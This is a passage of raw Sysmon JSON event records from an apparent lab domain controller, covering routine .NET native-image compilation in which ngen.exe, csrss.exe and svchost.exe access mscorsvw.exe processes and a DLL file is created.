\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8232,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.481\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010D1041200}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.481","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010D1041200}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8233,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010D1041200}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010D1041200}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8234,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.481\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010D1041200}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.481","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010D1041200}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8235,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.528\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051C-5F25-0000-00106A5C1300}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.528","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051C-5F25-0000-00106A5C1300}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8236,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.528\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051C-5F25-0000-00106A5C1300}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.528","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051C-5F25-0000-00106A5C1300}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8237,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:00.544\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051C-5F25-0000-00106A5C1300}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:00.544","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051C-5F25-0000-00106A5C1300}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8238,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:01.044\r\nProcessGuid: {A837DB8D-051C-5F25-0000-00106A5C1300}\r\nProcessId: 2988\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\bac-0\\System.DirectoryServices.dll\r\nCreationUtcTime: 2020-08-01 06:01:01.044","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:01.044","ProcessGuid":"{A837DB8D-051C-5F25-0000-00106A5C1300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\bac-0\\System.DirectoryServices.dll","CreationUtcTime":"2020-08-01 06:01:01.044","EventReceivedTime":"2020-08-01 06:01:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:01","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8239,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:01.106\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051D-5F25-0000-0010EF601300}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:01.106","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051D-5F25-0000-0010EF601300}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework